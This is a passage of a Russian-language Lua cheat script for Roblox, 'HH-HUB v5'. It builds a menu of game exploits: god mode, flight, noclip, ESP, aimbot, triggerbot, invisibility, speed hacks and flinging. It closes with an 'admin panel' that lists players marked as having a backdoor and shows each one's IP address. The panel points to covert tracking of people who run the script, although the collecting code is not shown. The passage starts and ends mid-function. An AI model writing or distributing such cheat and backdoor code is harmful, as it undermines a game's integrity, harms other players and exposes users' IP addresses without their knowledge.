                local section = {}
                
                local header = Instance.new("Frame")
                header.Size = UDim2.new(1, 0, 0, 35)
                header.BackgroundTransparency = 1
                header.Parent = tab.Frame
                
                local label = Instance.new("TextLabel")
                label.Size = UDim2.new(1, 0, 1, 0)
                label.BackgroundTransparency = 1
                label.Text = "  " .. title
                label.TextColor3 = Color3.fromRGB(170, 120, 255)
                label.TextScaled = true
                label.Font = Enum.Font.GothamBold
                label.TextXAlignment = Enum.TextXAlignment.Left
                label.Parent = header
                
                function section:AddButton(text, desc, color, cb)
                    local frame = Instance.new("Frame")
                    frame.Size = UDim2.new(1, 0, 0, 50)
                    frame.BackgroundColor3 = Color3.fromRGB(30, 30, 40)
                    frame.Parent = tab.Frame
                    
                    local fCorner = Instance.new("UICorner")
                    fCorner.CornerRadius = UDim.new(0, 8)
                    fCorner.Parent = frame
                    
                    local btn = Instance.new("TextButton")
                    btn.Size = UDim2.new(1, 0, 1, 0)
                    btn.BackgroundColor3 = color or Color3.fromRGB(100, 60, 200)
                    btn.BackgroundTransparency = 0.1
                    btn.Text = ""
                    btn.Parent = frame
                    
                    local btnCorner = Instance.new("UICorner")
                    btnCorner.CornerRadius = UDim.new(0, 8)
                    btnCorner.Parent = btn
                    
                    local btnText = Instance.new("TextLabel")
                    btnText.Size = UDim2.new(0.5, 0, 1, 0)
                    btnText.Position = UDim2.new(0, 15, 0, 0)
                    btnText.BackgroundTransparency = 1
                    btnText.Text = text
                    btnText.TextColor3 = Color3.fromRGB(255, 255, 255)
                    btnText.TextScaled = true
                    btnText.Font = Enum.Font.GothamBold
                    btnText.TextXAlignment = Enum.TextXAlignment.Left
                    btnText.Parent = btn
                    
                    local btnDesc = Instance.new("TextLabel")
                    btnDesc.Size = UDim2.new(0.5, -25, 1, 0)
                    btnDesc.Position = UDim2.new(0.5, 10, 0, 0)
                    btnDesc.BackgroundTransparency = 1
                    btnDesc.Text = desc or ""
                    btnDesc.TextColor3 = Color3.fromRGB(180, 180, 180)
                    btnDesc.TextScaled = true
                    btnDesc.Font = Enum.Font.Gotham
                    btnDesc.Parent = btn
                    
                    btn.MouseButton1Click:Connect(cb)
                end
                
                function section:AddToggle(text, desc, default, cb)
                    local state = default or false
                    
                    local frame = Instance.new("Frame")
                    frame.Size = UDim2.new(1, 0, 0, 50)
                    frame.BackgroundColor3 = Color3.fromRGB(30, 30, 40)
                    frame.Parent = tab.Frame
                    
                    local fCorner = Instance.new("UICorner")
                    fCorner.CornerRadius = UDim.new(0, 8)
                    fCorner.Parent = frame
                    
                    local toggle = Instance.new("TextButton")
                    toggle.Size = UDim2.new(0, 80, 0, 36)
                    toggle.Position = UDim2.new(1, -95, 0.5, -18)
                    toggle.BackgroundColor3 = state and Color3.fromRGB(80, 220, 120) or Color3.fromRGB(80, 80, 100)
                    toggle.Text = ""
                    toggle.Parent = frame
                    
                    local tCorner = Instance.new("UICorner")
                    tCorner.CornerRadius = UDim.new(0, 18)
                    tCorner.Parent = toggle
                    
                    local knob = Instance.new("Frame")
                    knob.Size = UDim2.new(0, 32, 0, 32)
                    knob.Position = state and UDim2.new(1, -36, 0.5, -16) or UDim2.new(0, 4, 0.5, -16)
                    knob.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
                    knob.Parent = toggle
                    
                    local kCorner = Instance.new("UICorner")
                    kCorner.CornerRadius = UDim.new(1, 0)
                    kCorner.Parent = knob
                    
                    local textLabel = Instance.new("TextLabel")
                    textLabel.Size = UDim2.new(0.5, 0, 1, 0)
                    textLabel.Position = UDim2.new(0, 15, 0, 0)
                    textLabel.BackgroundTransparency = 1
                    textLabel.Text = text
                    textLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
                    textLabel.TextScaled = true
                    textLabel.Font = Enum.Font.GothamBold
                    textLabel.TextXAlignment = Enum.TextXAlignment.Left
                    textLabel.Parent = frame
                    
                    local descLabel = Instance.new("TextLabel")
                    descLabel.Size = UDim2.new(0.4, -95, 1, 0)
                    descLabel.Position = UDim2.new(0.5, 10, 0, 0)
                    descLabel.BackgroundTransparency = 1
                    descLabel.Text = desc or ""
                    descLabel.TextColor3 = Color3.fromRGB(160, 160, 160)
                    descLabel.TextScaled = true
                    descLabel.Font = Enum.Font.Gotham
                    descLabel.Parent = frame
                    
                    toggle.MouseButton1Click:Connect(function()
                        state = not state
                        toggle.BackgroundColor3 = state and Color3.fromRGB(80, 220, 120) or Color3.fromRGB(80, 80, 100)
                        knob.Position = state and UDim2.new(1, -36, 0.5, -16) or UDim2.new(0, 4, 0.5, -16)
                        cb(state)
                    end)
                end
                
                function section:AddSlider(text, min, max, default, suffix, cb)
                    local val = default or min
                    
                    local frame = Instance.new("Frame")
                    frame.Size = UDim2.new(1, 0, 0, 70)
                    frame.BackgroundColor3 = Color3.fromRGB(30, 30, 40)
                    frame.Parent = tab.Frame
                    
                    local fCorner = Instance.new("UICorner")
                    fCorner.CornerRadius = UDim.new(0, 8)
                    fCorner.Parent = frame
                    
                    local label = Instance.new("TextLabel")
                    label.Size = UDim2.new(0.5, 0, 0, 25)
                    label.Position = UDim2.new(0, 15, 0, 5)
                    label.BackgroundTransparency = 1
                    label.Text = text
                    label.TextColor3 = Color3.fromRGB(255, 255, 255)
                    label.TextScaled = true
                    label.Font = Enum.Font.GothamBold
                    label.TextXAlignment = Enum.TextXAlignment.Left
                    label.Parent = frame
                    
                    local valueLabel = Instance.new("TextLabel")
                    valueLabel.Size = UDim2.new(0.3, 0, 0, 25)
                    valueLabel.Position = UDim2.new(0.7, -15, 0, 5)
                    valueLabel.BackgroundTransparency = 1
                    valueLabel.Text = tostring(val) .. (suffix or "")
                    valueLabel.TextColor3 = Color3.fromRGB(170, 120, 255)
                    valueLabel.TextScaled = true
                    valueLabel.Font = Enum.Font.GothamBold
                    valueLabel.TextXAlignment = Enum.TextXAlignment.Right
                    valueLabel.Parent = frame
                    
                    local bg = Instance.new("Frame")
                    bg.Size = UDim2.new(1, -30, 0, 12)
                    bg.Position = UDim2.new(0, 15, 0, 40)
                    bg.BackgroundColor3 = Color3.fromRGB(50, 50, 70)
                    bg.Parent = frame
                    
                    local bgCorner = Instance.new("UICorner")
                    bgCorner.CornerRadius = UDim.new(0, 6)
                    bgCorner.Parent = bg
                    
                    local fill = Instance.new("Frame")
                    fill.Size = UDim2.new((val - min) / (max - min), 0, 1, 0)
                    fill.BackgroundColor3 = Color3.fromRGB(140, 80, 255)
                    fill.Parent = bg
                    
                    local fillCorner = Instance.new("UICorner")
                    fillCorner.CornerRadius = UDim.new(0, 6)
                    fillCorner.Parent = fill
                    
                    local knob = Instance.new("Frame")
                    knob.Size = UDim2.new(0, 24, 0, 24)
                    knob.Position = UDim2.new((val - min) / (max - min), -12, 0.5, -12)
                    knob.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
                    knob.Parent = bg
                    
                    local knobCorner = Instance.new("UICorner")
                    knobCorner.CornerRadius = UDim.new(1, 0)
                    knobCorner.Parent = knob
                    
                    local dragging = false
                    
                    knob.InputBegan:Connect(function(input)
                        if input.UserInputType == Enum.UserInputType.MouseButton1 then
                            dragging = true
                        end
                    end)
                    
                    UIS.InputEnded:Connect(function(input)
                        if input.UserInputType == Enum.UserInputType.MouseButton1 then
                            dragging = false
                        end
                    end)
                    
                    UIS.InputChanged:Connect(function(input)
                        if not dragging then return end
                        if input.UserInputType ~= Enum.UserInputType.MouseMovement then return end
                        
                        local mouse = UIS:GetMouseLocation()
                        local bgPos = bg.AbsolutePosition.X
                        local bgSize = bg.AbsoluteSize.X
                        
                        local rel = math.clamp((mouse.X - bgPos) / bgSize, 0, 1)
                        val = math.floor(min + rel * (max - min))
                        
                        fill.Size = UDim2.new(rel, 0, 1, 0)
                        knob.Position = UDim2.new(rel, -12, 0.5, -12)
                        valueLabel.Text = tostring(val) .. (suffix or "")
                        cb(val)
                    end)
                end
                
                return section
            end
            
            return tab
        end
        
        return window
    end
end

-- ==============================================
-- СОЗДАНИЕ МЕНЮ
-- ==============================================
local Window = Library:CreateWindow("HH-HUB v5")

-- ВКЛАДКА 1: БОЕВЫЕ
local CombatTab = Window:AddTab("Боевые", "⚔️")
local CombatSect = CombatTab:AddSection("Основные функции")

CombatSect:AddToggle("God Mode", "Полная неуязвимость", GodMode.active, function(v)
    if v then enableGodMode() else disableGodMode() end
end)

CombatSect:AddToggle("Полёт", "WASD + Space/Ctrl", Flight.active, function(v)
    if v then enableFlight() else disableFlight() end
end)

CombatSect:AddToggle("Ноклип", "Сквозь стены", Noclip.active, function(v)
    if v then enableNoclip() else disableNoclip() end
end)

CombatSect:AddToggle("ESP", "Подсветка игроков", ESP.active, function(v)
    if v then enableESP() else disableESP() end
end)

CombatSect:AddToggle("Aimbot", "Автонаведение", Aimbot.active, function(v)
    if v then enableAimbot() else disableAimbot() end
end)

CombatSect:AddToggle("Triggerbot", "Автострельба", Triggerbot.active, function(v)
    if v then enableTriggerbot() else disableTriggerbot() end
end)

CombatSect:AddToggle("Anti-AFK", "Защита от бездействия", AntiAfk.active, function(v)
    if v then enableAntiAfk() else disableAntiAfk() end
end)

CombatSect:AddToggle("Бесконечный прыжок", "Прыжки в воздухе", InfJump.active, function(v)
    if v then enableInfJump() else disableInfJump() end
end)

CombatSect:AddButton("Убить себя", "Мгновенная смерть", Color3.fromRGB(220, 60, 60), function()
    local hum = LP.Character and LP.Character:FindFirstChildOfClass("Humanoid")
    if hum then hum.Health = 0 end
end)

CombatSect:AddButton("Флинг", "Отбросить игрока", Color3.fromRGB(180, 60, 180), function()
    local root = LP.Character and LP.Character:FindFirstChild("HumanoidRootPart")
    if root then
        local bv = Instance.new("BodyVelocity")
        bv.Velocity = Vector3.new(math.random(-500, 500), math.random(500, 1000), math.random(-500, 500))
        bv.MaxForce = Vector3.new(1e9, 1e9, 1e9)
        bv.Parent = root
        game:GetService("Debris"):AddItem(bv, 0.3)
    end
end)

-- ВКЛАДКА 2: ДВИЖЕНИЕ
local MoveTab = Window:AddTab("Движение", "🏃")
local MoveSect1 = MoveTab:AddSection("Скорость и прыжки")

MoveSect1:AddSlider("Скорость ходьбы", 1, 300, 16, "", function(v)
    local hum = LP.Character and LP.Character:FindFirstChildOfClass("Humanoid")
    if hum then hum.WalkSpeed = v end
end)

MoveSect1:AddSlider("Сила прыжка", 1, 200, 50, "", function(v)
    local hum = LP.Character and LP.Character:FindFirstChildOfClass("Humanoid")
    if hum then hum.JumpPower = v end
end)

MoveSect1:AddSlider("Скорость полёта", 5, 500, 50, "", function(v)
    Flight.speed = v
end)

MoveSect1:AddToggle("Ускорение ходьбы", "x4 скорость (60)", WalkspeedBoost.active, function(v)
    if v then enableWalkspeedBoost() else disableWalkspeedBoost() end
end)

MoveSect1:AddToggle("Ускорение прыжка", "x2 прыжок (100)", JumpBoost.active, function(v)
    if v then enableJumpBoost() else disableJumpBoost() end
end)

local MoveSect2 = MoveTab:AddSection("Особые режимы")

MoveSect2:AddToggle("Клик-телепорт", "ТП по клику мыши", ClickTP.active, function(v)
    if v then enableClickTP() else disableClickTP() end
end)

MoveSect2:AddToggle("Нет урона от падения", "Защита от падений", NoFallDamage.active, function(v)
    if v then enableNoFallDamage() else disableNoFallDamage() end
end)

MoveSect2:AddToggle("Bunny Hop", "Автопрыжок при беге", BunnyHop.active, function(v)
    if v then enableBunnyHop() else disableBunnyHop() end
end)

MoveSect2:AddToggle("Spider", "Хождение по стенам", Spider.active, function(v)
    if v then enableSpider() else disableSpider() end
end)

MoveSect2:AddToggle("Vanish", "Невидимость", Vanish.active, function(v)
    if v then enableVanish() else disableVanish() end
end)

-- ВКЛАДКА 3: ВИЗУАЛ
local VisualTab = Window:AddTab("Визуал", "🎨")
local VisualSect = VisualTab:AddSection("Эффекты")

VisualSect:AddToggle("X-Ray", "Видеть сквозь стены", XRay.active, function(v)
    if v then enableXRay() else disableXRay() end
end)

VisualSect:AddSlider("Поле зрения", 30, 120, 70, "", function(v)
    Camera.FieldOfView = v
end)

VisualSect:AddSlider("Яркость", 0, 5, 2, "", function(v)
    Lighting.Brightness = v
end)

VisualSect:AddButton("Flash", "Вспышка", Color3.fromRGB(255, 255, 0), function()
    local sg = Instance.new("ScreenGui")
    sg.Parent = LP:FindFirstChild("PlayerGui") or Instance.new("ScreenGui")
    
    local f = Instance.new("Frame", sg)
    f.Size = UDim2.new(1, 0, 1, 0)
    f.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
    f.BackgroundTransparency = 0
    f.ZIndex = 10
    
    TS:Create(f, TweenInfo.new(0.9), { BackgroundTransparency = 1 }):Play()
    game:GetService("Debris"):AddItem(sg, 1.5)
end)

VisualSect:AddButton("Seizure", "Эпилепсия", Color3.fromRGB(255, 0, 128), function()
    task.spawn(function()
        for i = 1, 30 do
            Lighting.FogColor = Color3.fromRGB(math.random(0, 255), math.random(0, 255), math.random(0, 255))
            task.wait(0.05)
        end
        Lighting.FogColor = Color3.fromRGB(128, 128, 128)
    end)
end)

VisualSect:AddButton("Disco", "Дискотека", Color3.fromRGB(255, 100, 0), function()
    task.spawn(function()
        for i = 1, 30 do
            Lighting.Brightness = math.random(0, 3)
            task.wait(0.1)
        end
        Lighting.Brightness = 2
    end)
end)

VisualSect:AddButton("Fullbright", "Максимальная яркость", Color3.fromRGB(255, 255, 255), function()
    Lighting.Brightness = 2
    Lighting.Ambient = Color3.fromRGB(255, 255, 255)
end)

-- ВКЛАДКА 4: УТИЛИТЫ
local UtilTab = Window:AddTab("Утилиты", "🛠️")
local UtilSect = UtilTab:AddSection("Полезные функции")

UtilSect:AddButton("Информация", "Данные аккаунта", Color3.fromRGB(100, 150, 255), function()
    local info = string.format(
        "Имя: %s\nID: %d\nВозраст: %d дней\nПлатформа: %s",
        LP.Name,
        LP.UserId,
        LP.AccountAge,
        UIS.TouchEnabled and "Мобильное" or "ПК"
    )
    SG:SetCore("SendNotification", {
        Title = "Информация",
        Text = info,
        Duration = 5
    })
end)

UtilSect:AddButton("FPS Boost", "Оптимизация", Color3.fromRGB(50, 200, 50), function()
    pcall(function()
        Lighting.GlobalShadows = false
        Lighting.FogEnd = 9e9
        workspace.Terrain.WaterWaveSize = 0
        workspace.Terrain.WaterWaveSpeed = 0
    end)
end)

UtilSect:AddButton("Spin", "Вращение (5 сек)", Color3.fromRGB(60, 170, 210), function()
    local root = LP.Character and LP.Character:FindFirstChild("HumanoidRootPart")
    if root then
        local ang = 0
        local conn = RS.RenderStepped:Connect(function()
            ang = ang + 10
            root.CFrame = CFrame.new(root.Position) * CFrame.Angles(0, math.rad(ang), 0)
        end)
        task.delay(5, function() if conn then conn:Disconnect() end end)
    end
end)

UtilSect:AddButton("Loop Kill", "Самоубийство (30 сек)", Color3.fromRGB(160, 20, 20), function()
    local conn = RS.Heartbeat:Connect(function()
        local hum = LP.Character and LP.Character:FindFirstChildOfClass("Humanoid")
        if hum then hum.Health = 0 end
    end)
    task.delay(30, function() if conn then conn:Disconnect() end end)
end)

UtilSect:AddButton("Вылечить", "Восстановить HP", Color3.fromRGB(60, 220, 120), function()
    local hum = LP.Character and LP.Character:FindFirstChildOfClass("Humanoid")
    if hum then hum.Health = hum.MaxHealth end
end)

UtilSect:AddButton("ТП в центр", "0, 50, 0", Color3.fromRGB(50, 150, 255), function()
    local root = LP.Character and LP.Character:FindFirstChild("HumanoidRootPart")
    if root then root.CFrame = CFrame.new(0, 50, 0) end
end)

UtilSect:AddButton("ТП в небо", "+500 по Y", Color3.fromRGB(100, 200, 255), function()
    local root = LP.Character and LP.Character:FindFirstChild("HumanoidRootPart")
    if root then root.CFrame = root.CFrame * CFrame.new(0, 500, 0) end
end)

UtilSect:AddButton("Сбросить персонажа", "Перезагрузить", Color3.fromRGB(200, 150, 50), function()
    local char = LP.Character
    if char then char:BreakJoints() end
end)

UtilSect:AddButton("Копировать ID", "В буфер обмена", Color3.fromRGB(150, 150, 150), function()
    if setclipboard then
        setclipboard(tostring(LP.UserId))
        SG:SetCore("SendNotification", {
            Title = "Скопировано",
            Text = "ID: " .. LP.UserId,
            Duration = 2
        })
    end
end)

UtilSect:AddButton("Перезагрузить игру", "Teleport", Color3.fromRGB(200, 100, 100), function()
    TPS:Teleport(game.PlaceId, LP)
end)

-- ВКЛАДКА 5: РАЗНОЕ
local MiscTab = Window:AddTab("Разное", "🎲")
local MiscSect = MiscTab:AddSection("Экспериментальное")

MiscSect:AddButton("Big Head", "Огромная голова", Color3.fromRGB(100, 80, 200), function()
    local head = LP.Character and LP.Character:FindFirstChild("Head")
    if head then
        TS:Create(head, TweenInfo.new(0.5), { Size = Vector3.new(4, 4, 4) }):Play()
        task.delay(8, function()
            TS:Create(head, TweenInfo.new(0.5), { Size = Vector3.new(2, 1, 1) }):Play()
        end)
    end
end)

MiscSect:AddButton("Маленькая голова", "Уменьшить", Color3.fromRGB(50, 50, 150), function()
    local head = LP.Character and LP.Character:FindFirstChild("Head")
    if head then
        TS:Create(head, TweenInfo.new(0.5), { Size = Vector3.new(0.5, 0.5, 0.5) }):Play()
        task.delay(8, function()
            TS:Create(head, TweenInfo.new(0.5), { Size = Vector3.new(2, 1, 1) }):Play()
        end)
    end
end)

MiscSect:AddButton("Длинные руки", "Анимация", Color3.fromRGB(150, 100, 100), function()
    local leftArm = LP.Character and LP.Character:FindFirstChild("Left Arm") or LP.Character and LP.Character:FindFirstChild("LeftHand")
    local rightArm = LP.Character and LP.Character:FindFirstChild("Right Arm") or LP.Character and LP.Character:FindFirstChild("RightHand")
    if leftArm and rightArm then
        TS:Create(leftArm, TweenInfo.new(0.5), { Size = Vector3.new(1, 3, 1) }):Play()
        TS:Create(rightArm, TweenInfo.new(0.5), { Size = Vector3.new(1, 3, 1) }):Play()
        task.delay(8, function()
            TS:Create(leftArm, TweenInfo.new(0.5), { Size = Vector3.new(1, 1, 1) }):Play()
            TS:Create(rightArm, TweenInfo.new(0.5), { Size = Vector3.new(1, 1, 1) }):Play()
        end)
    end
end)

MiscSect:AddButton("Длинные ноги", "Анимация", Color3.fromRGB(100, 150, 100), function()
    local leftLeg = LP.Character and LP.Character:FindFirstChild("Left Leg") or LP.Character and LP.Character:FindFirstChild("LeftFoot")
    local rightLeg = LP.Character and LP.Character:FindFirstChild("Right Leg") or LP.Character and LP.Character:FindFirstChild("RightFoot")
    if leftLeg and rightLeg then
        TS:Create(leftLeg, TweenInfo.new(0.5), { Size = Vector3.new(1, 3, 1) }):Play()
        TS:Create(rightLeg, TweenInfo.new(0.5), { Size = Vector3.new(1, 3, 1) }):Play()
        task.delay(8, function()
            TS:Create(leftLeg, TweenInfo.new(0.5), { Size = Vector3.new(1, 1, 1) }):Play()
            TS:Create(rightLeg, TweenInfo.new(0.5), { Size = Vector3.new(1, 1, 1) }):Play()
        end)
    end
end)

MiscSect:AddButton("Толстый", "В ширину", Color3.fromRGB(200, 150, 50), function()
    for _, v in ipairs(LP.Character:GetChildren()) do
        if v:IsA("Part") or v:IsA("MeshPart") then
            TS:Create(v, TweenInfo.new(0.5), { Size = v.Size * Vector3.new(1.5, 1, 1.5) }):Play()
        end
    end
    task.delay(8, function()
        for _, v in ipairs(LP.Character:GetChildren()) do
            if v:IsA("Part") or v:IsA("MeshPart") then
                TS:Create(v, TweenInfo.new(0.5), { Size = v.Size / Vector3.new(1.5, 1, 1.5) }):Play()
            end
        end
    end)
end)

MiscSect:AddButton("Тонкий", "В высоту", Color3.fromRGB(50, 150, 200), function()
    for _, v in ipairs(LP.Character:GetChildren()) do
        if v:IsA("Part") or v:IsA("MeshPart") then
            TS:Create(v, TweenInfo.new(0.5), { Size = Vector3.new(v.Size.X * 0.5, v.Size.Y * 1.5, v.Size.Z * 0.5) }):Play()
        end
    end
    task.delay(8, function()
        for _, v in ipairs(LP.Character:GetChildren()) do
            if v:IsA("Part") or v:IsA("MeshPart") then
                TS:Create(v, TweenInfo.new(0.5), { Size = Vector3.new(v.Size.X * 2, v.Size.Y / 1.5, v.Size.Z * 2) }):Play()
            end
        end
    end)
end)

MiscSect:AddButton("Изменить цвет", "Случайный цвет", Color3.fromRGB(255, 0, 255), function()
    for _, v in ipairs(LP.Character:GetChildren()) do
        if v:IsA("Part") or v:IsA("MeshPart") then
            v.BrickColor = BrickColor.random()
        end
    end
end)

MiscSect:AddButton("Эмоции", "В чат", Color3.fromRGB(255, 100, 150), function()
    local emotes = {"Laugh", "Dance", "Wave", "Point", "Cheer", "Clap"}
    for i = 1, 5 do
        local emote = emotes[math.random(#emotes)]
        SG:SetCore("ChatMakeSystemMessage", {
            Text = "*" .. emote .. "*",
            Color = Color3.fromRGB(255, 200, 200)
        })
        task.wait(0.5)
    end
end)

-- ==============================================
-- АДМИН-ПАНЕЛЬ
-- ==============================================

local function createAdminPanel()
    if adminPanel then
        adminPanel:Destroy()
        adminPanel = nil
        return
    end
    
    adminPanel = Instance.new("ScreenGui")
    adminPanel.Name = "HH_Admin"
    adminPanel.ResetOnSpawn = false
    adminPanel.Parent = LP:FindFirstChild("PlayerGui") or Instance.new("ScreenGui")
    
    -- Затемнение фона
    local overlay = Instance.new("Frame")
    overlay.Size = UDim2.new(1, 0, 1, 0)
    overlay.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
    overlay.BackgroundTransparency = 0.5
    overlay.Parent = adminPanel
    
    -- Главное окно
    local frame = Instance.new("Frame")
    frame.Size = UDim2.new(0, 900, 0, 650)
    frame.Position = UDim2.new(0.5, -450, 0.5, -325)
    frame.BackgroundColor3 = Color3.fromRGB(15, 15, 25)
    frame.Parent = adminPanel
    
    local fCorner = Instance.new("UICorner")
    fCorner.CornerRadius = UDim.new(0, 12)
    fCorner.Parent = frame
    
    -- Заголовок
    local title = Instance.new("TextLabel")
    title.Size = UDim2.new(1, 0, 0, 55)
    title.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
    title.BackgroundTransparency = 0.3
    title.Text = "👑 АДМИН-ПАНЕЛЬ"
    title.TextColor3 = Color3.fromRGB(200, 150, 255)
    title.TextScaled = true
    title.Font = Enum.Font.GothamBold
    title.Parent = frame
    
    local tCorner = Instance.new("UICorner")
    tCorner.CornerRadius = UDim.new(0, 12)
    tCorner.Parent = title
    
    -- Кнопка закрытия
    local close = Instance.new("TextButton")
    close.Size = UDim2.new(0, 40, 0, 40)
    close.Position = UDim2.new(1, -50, 0, 7.5)
    close.BackgroundColor3 = Color3.fromRGB(220, 60, 60)
    close.Text = "✕"
    close.TextColor3 = Color3.fromRGB(255, 255, 255)
    close.TextScaled = true
    close.Font = Enum.Font.GothamBold
    close.Parent = frame
    
    local cCorner = Instance.new("UICorner")
    cCorner.CornerRadius = UDim.new(0, 8)
    cCorner.Parent = close
    
    close.MouseButton1Click:Connect(function()
        adminPanel:Destroy()
        adminPanel = nil
    end)
    
    -- Контент
    local content = Instance.new("ScrollingFrame")
    content.Size = UDim2.new(1, -20, 1, -75)
    content.Position = UDim2.new(0, 10, 0, 65)
    content.BackgroundColor3 = Color3.fromRGB(20, 20, 30)
    content.BorderSizePixel = 0
    content.ScrollBarThickness = 5
    content.ScrollBarImageColor3 = Color3.fromRGB(140, 80, 255)
    content.AutomaticCanvasSize = Enum.AutomaticSize.Y
    content.Parent = frame
    
    local contentLayout = Instance.new("UIListLayout")
    contentLayout.Padding = UDim.new(0, 10)
    contentLayout.SortOrder = Enum.SortOrder.LayoutOrder
    contentLayout.Parent = content
    
    -- Поиск
    local searchBox = Instance.new("TextBox")
    searchBox.Size = UDim2.new(1, -20, 0, 40)
    searchBox.Position = UDim2.new(0, 10, 0, 5)
    searchBox.BackgroundColor3 = Color3.fromRGB(30, 30, 40)
    searchBox.PlaceholderText = "🔍 Поиск..."
    searchBox.Text = ""
    searchBox.TextColor3 = Color3.fromRGB(255, 255, 255)
    searchBox.TextScaled = true
    searchBox.Font = Enum.Font.Gotham
    searchBox.Parent = content
    
    local sCorner = Instance.new("UICorner")
    sCorner.CornerRadius = UDim.new(0, 8)
    sCorner.Parent = searchBox
    
    -- Статистика
    local statsFrame = Instance.new("Frame")
    statsFrame.Size = UDim2.new(1, -20, 0, 45)
    statsFrame.Position = UDim2.new(0, 10, 0, 50)
    statsFrame.BackgroundColor3 = Color3.fromRGB(35, 35, 45)
    statsFrame.Parent = content
    
    local statsCorner = Instance.new("UICorner")
    statsCorner.CornerRadius = UDim.new(0, 8)
    statsCorner.Parent = statsFrame
    
    local totalLabel = Instance.new("TextLabel")
    totalLabel.Size = UDim2.new(0.34, 0, 1, 0)
    totalLabel.BackgroundTransparency = 1
    totalLabel.Text = "Всего: 0"
    totalLabel.TextColor3 = Color3.fromRGB(200, 200, 255)
    totalLabel.TextScaled = true
    totalLabel.Font = Enum.Font.GothamBold
    totalLabel.Parent = statsFrame
    
    local sameLabel = Instance.new("TextLabel")
    sameLabel.Size = UDim2.new(0.33, 0, 1, 0)
    sameLabel.Position = UDim2.new(0.34, 0, 0, 0)
    sameLabel.BackgroundTransparency = 1
    sameLabel.Text = "В сервере: 0"
    sameLabel.TextColor3 = Color3.fromRGB(100, 255, 100)
    sameLabel.TextScaled = true
    sameLabel.Font = Enum.Font.GothamBold
    sameLabel.Parent = statsFrame
    
    local backdoorLabel = Instance.new("TextLabel")
    backdoorLabel.Size = UDim2.new(0.33, 0, 1, 0)
    backdoorLabel.Position = UDim2.new(0.67, 0, 0, 0)
    backdoorLabel.BackgroundTransparency = 1
    backdoorLabel.Text = "Бекдор: 0"
    backdoorLabel.TextColor3 = Color3.fromRGB(255, 100, 255)
    backdoorLabel.TextScaled = true
    backdoorLabel.Font = Enum.Font.GothamBold
    backdoorLabel.Parent = statsFrame
    
    -- Функция добавления карточки игрока
    local function addPlayerCard(uid, info)
        local card = Instance.new("Frame")
        card.Size = UDim2.new(1, -20, 0, 200)
        card.BackgroundColor3 = Color3.fromRGB(30, 30, 40)
        card.Parent = content
        
        local cardCorner = Instance.new("UICorner")
        cardCorner.CornerRadius = UDim.new(0, 8)
        cardCorner.Parent = card
        
        -- Статус
        local status = Instance.new("Frame")
        status.Size = UDim2.new(0, 12, 0, 12)
        status.Position = UDim2.new(0, 15, 0, 15)
        status.BackgroundColor3 = info.same and Color3.fromRGB(80, 220, 80) or Color3.fromRGB(220, 80, 80)
        status.Parent = card
        
        local sCorner = Instance.new("UICorner")
        sCorner.CornerRadius = UDim.new(1, 0)
        sCorner.Parent = status
        
        -- Имя
        local nameLabel = Instance.new("TextLabel")
        nameLabel.Size = UDim2.new(0.5, 0, 0, 25)
        nameLabel.Position = UDim2.new(0, 35, 0, 8)
        nameLabel.BackgroundTransparency = 1
        nameLabel.Text = info.name .. (info.hasBackdoor and " [Б]" or "")
        nameLabel.TextColor3 = info.hasBackdoor and Color3.fromRGB(100, 255, 100) or Color3.fromRGB(255, 255, 255)
        nameLabel.TextScaled = true
        nameLabel.Font = Enum.Font.GothamBold
        nameLabel.TextXAlignment = Enum.TextXAlignment.Left
        nameLabel.Parent = card
        
        -- ID
        local idLabel = Instance.new("TextLabel")
        idLabel.Size = UDim2.new(0.5, 0, 0, 20)
        idLabel.Position = UDim2.new(0.5, 0, 0, 10)
        idLabel.BackgroundTransparency = 1
        idLabel.Text = "ID: " .. uid:sub(1, 8) .. "..."
        idLabel.TextColor3 = Color3.fromRGB(180, 180, 180)
        idLabel.TextScaled = true
        idLabel.Font = Enum.Font.Gotham
        idLabel.TextXAlignment = Enum.TextXAlignment.Left
        idLabel.Parent = card
        
        -- Место
        local placeLabel = Instance.new("TextLabel")
        placeLabel.Size = UDim2.new(0.5, 0, 0, 20)
        placeLabel.Position = UDim2.new(0, 35, 0, 33)
        placeLabel.BackgroundTransparency = 1
        placeLabel.Text = "📍 Place: " .. tostring(info.place):sub(1, 8)
        placeLabel.TextColor3 = info.same and Color3.fromRGB(100, 255, 100) or Color3.fromRGB(255, 255, 100)
        placeLabel.TextScaled = true
        placeLabel.Font = Enum.Font.Gotham
        placeLabel.TextXAlignment = Enum.TextXAlignment.Left
        placeLabel.Parent = card
        
        -- IP
        local ipLabel = Instance.new("TextLabel")
        ipLabel.Size = UDim2.new(0.5, 0, 0, 20)
        ipLabel.Position = UDim2.new(0, 35, 0, 53)
        ipLabel.BackgroundTransparency = 1
        ipLabel.Text = "🌐 IP: " .. (info.ip or "Unknown")
        ipLabel.TextColor3 = Color3.fromRGB(200, 200, 255)
        ipLabel.TextScaled = true
        ipLabel.Font = Enum.Font.Gotham
        ipLabel.TextXAlignment = Enum.TextXAlignment.Left
        ipLabel.Parent = card
        
        -- Время
        local timeLabel = Instance.new("TextLabel")
        timeLabel.Size = UDim2.new(0.5, 0, 0, 20)
        timeLabel.Position = UDim2.new(0.5, 0, 0, 53)
        timeLabel.BackgroundTransparency = 1
        timeLabel.Text = "⏰ " .. os.date("%H:%M:%S", info.time or tick())
        timeLabel.TextColor3 = Color3.fromRGB(150, 150, 255)
        timeLabel.TextScaled = true
        timeLabel.Font = Enum.Font.Gotham
        timeLabel.TextXAlignment = Enum.TextXAlignment.Left
        timeLabel.Parent = card
        
        -- Контейнер для кнопок
        local btnContainer = Instance.new("Frame")
        btnContainer.Size = UDim2.new(1, -20, 0, 90)
        btnContainer.Position = UDim2.new(0, 10, 0, 80)
        btnContainer.BackgroundTransparency = 1
        btnContainer.Parent = card
        
        local grid = Instance.new("UIGridLayout")
        grid.CellSize = UDim2.new(0, 75, 0, 28)
        grid.CellPadding = UDim2.new(0, 3, 0, 3)
        grid.FillDirection = Enum.FillDirection.Horizontal
        grid.Parent = btnContainer
        
        -- Функция создания кнопки
        local function addBtn(text, color, callback)
            local btn = Instance.new("TextButton")
            btn.Size = UDim2.new(0, 75, 0, 28)
            btn.BackgroundColor3 = color
            btn.Text = text
            btn.TextColor3 = Color3.fromRGB(255, 255, 255)
            btn.TextScaled = true
